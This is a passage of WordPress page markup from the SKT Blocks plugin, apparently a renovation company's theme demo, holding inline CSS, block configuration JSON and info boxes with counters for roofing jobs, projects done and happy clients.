49px; }\n .skt-blocks-block-fb9c616c-94f6-41ad-b52c-871ae91bc1ce.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-fb9c616c-94f6-41ad-b52c-871ae91bc1ce .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-fb9c616c-94f6-41ad-b52c-871ae91bc1ce.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-fb9c616c-94f6-41ad-b52c-871ae91bc1ce skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Roofing &amp; Siding </p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topMargin\":2,\"bottomPaddingMobile\":40,\"blockId\":\"03f8452a-5306-473c-9f20-b64a8489da47\"} -->\n<style type=\"text/css\"> .block-03f8452a-5306-473c-9f20-b64a8489da47 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-03f8452a-5306-473c-9f20-b64a8489da47 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-03f8452a-5306-473c-9f20-b64a8489da47 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 2px; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-03f8452a-5306-473c-9f20-b64a8489da47 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-03f8452a-5306-473c-9f20-b64a8489da47 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-03f8452a-5306-473c-9f20-b64a8489da47\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"d1d144d4-a222-421b-b344-6dcaa0866fba\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-d1d144d4-a222-421b-b344-6dcaa0866fba .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-d1d144d4-a222-421b-b344-6dcaa0866fba .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-d1d144d4-a222-421b-b344-6dcaa0866fba .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-d1d144d4-a222-421b-b344-6dcaa0866fba .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-d1d144d4-a222-421b-b344-6dcaa0866fba .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-d1d144d4-a222-421b-b344-6dcaa0866fba .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-d1d144d4-a222-421b-b344-6dcaa0866fba .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-d1d144d4-a222-421b-b344-6dcaa0866fba.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-d1d144d4-a222-421b-b344-6dcaa0866fba.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-d1d144d4-a222-421b-b344-6dcaa0866fba .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-d1d144d4-a222-421b-b344-6dcaa0866fba.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-d1d144d4-a222-421b-b344-6dcaa0866fba.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-d1d144d4-a222-421b-b344-6dcaa0866fba .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-d1d144d4-a222-421b-b344-6dcaa0866fba.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-d1d144d4-a222-421b-b344-6dcaa0866fba.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-d1d144d4-a222-421b-b344-6dcaa0866fba .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-d1d144d4-a222-421b-b344-6dcaa0866fba.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-d1d144d4-a222-421b-b344-6dcaa0866fba skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">341+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Projects Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"2574d265-8b42-4f36-88a5-393e9fd8a530\"} -->\n<style type=\"text/css\"> .block-2574d265-8b42-4f36-88a5-393e9fd8a530 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2574d265-8b42-4f36-88a5-393e9fd8a530 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2574d265-8b42-4f36-88a5-393e9fd8a530 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2574d265-8b42-4f36-88a5-393e9fd8a530 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2574d265-8b42-4f36-88a5-393e9fd8a530 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2574d265-8b42-4f36-88a5-393e9fd8a530\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"e870aee6-74af-4a1a-8fc3-f92474c2ac41\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-e870aee6-74af-4a1a-8fc3-f92474c2ac41 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-e870aee6-74af-4a1a-8fc3-f92474c2ac41 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-e870aee6-74af-4a1a-8fc3-f92474c2ac41 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-e870aee6-74af-4a1a-8fc3-f92474c2ac41 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-e870aee6-74af-4a1a-8fc3-f92474c2ac41 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-e870aee6-74af-4a1a-8fc3-f92474c2ac41 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-e870aee6-74af-4a1a-8fc3-f92474c2ac41 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-e870aee6-74af-4a1a-8fc3-f92474c2ac41.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-e870aee6-74af-4a1a-8fc3-f92474c2ac41.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-e870aee6-74af-4a1a-8fc3-f92474c2ac41 .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-e870aee6-74af-4a1a-8fc3-f92474c2ac41.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-e870aee6-74af-4a1a-8fc3-f92474c2ac41.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-e870aee6-74af-4a1a-8fc3-f92474c2ac41 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-e870aee6-74af-4a1a-8fc3-f92474c2ac41.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-e870aee6-74af-4a1a-8fc3-f92474c2ac41.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-e870aee6-74af-4a1a-8fc3-f92474c2ac41 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-e870aee6-74af-4a1a-8fc3-f92474c2ac41.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-e870aee6-74af-4a1a-8fc3-f92474c2ac41 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"d74f8f6c-2e34-458d-a14d-38439d394735\"} -->\n<style type=\"text/css\"> .block-d74f8f6c-2e34-458d-a14d-38439d394735 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d74f8f6c-2e34-458d-a14d-38439d394735 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d74f8f6c-2e34-458d-a14d-38439d394735 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d74f8f6c-2e34-458d-a14d-38439d394735 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d74f8f6c-2e34-458d-a14d-38439d394735 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d74f8f6c-2e34-458d-a14d-38439d394735\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"1343314b-0c9d-4350-8d3a-2621c8ffa8df\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-1343314b-0c9d-4350-8d3a-2621c8ffa8df .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-1343314b-0c9d-4350-8d3a-2621c8ffa8df .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-1343314b-0c9d-4350-8d3a-2621c8ffa8df .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-1343314b-0c9d-4350-8d3a-2621c8ffa8df .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-1343314b-0c9d-4350-8d3a-2621c8ffa8df .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-1343314b-0c9d-4350-8d3a-2621c8ffa8df .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-1343314b-0c9d-4350-8d3a-2621c8ffa8df .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-1343314b-0c9d-4350-8d3a-2621c8ffa8df.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-1343314b-0c9d-4350-8d3a-2621c8ffa8df.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-1343314b-0c9d-4350-8d3a-2621c8ffa8df .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-1343314b-0c9d-4350-8d3a-2621c8ffa8df.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-1343314b-0c9d-4350-8d3a-2621c8ffa8df.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-1343314b-0c9d-4350-8d3a-2621c8ffa8df .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-1343314b-0c9d-4350-8d3a-2621c8ffa8df.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-1343314b-0c9d-4350-8d3a-2621c8ffa8df.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-1343314b-0c9d-4350-8d3a-2621c8ffa8df .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-1343314b-0c9d-4350-8d3a-2621c8ffa8df.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-1343314b-0c9d-4350-8d3a-2621c8ffa8df skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">Our</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"5516cc91-fc54-44d5-993c-edc1d1a493ed\",\"topPadding\":100,\"topPaddingMobile\":60,\"topPaddingTablet\":80,\"bottomPadding\":0,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-6\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-6 skt-blocks-block-section-outer-wrap block-5516cc91-fc54-44d5-993c-edc1d1a493ed background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-5516cc91-fc54-44d5-993c-edc1d1a493ed .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-5516cc91-fc54-44d5-993c-edc1d1a493ed .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 60px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-5516cc91-fc54-44d5-993c-edc1d1a493ed .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-5516cc91-fc54-44d5-993c-edc1d1a493ed.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-5516cc91-fc54-44d5-993c-edc1d1a493ed.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-5516cc91-fc54-44d5-993c-edc1d1a493ed.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n 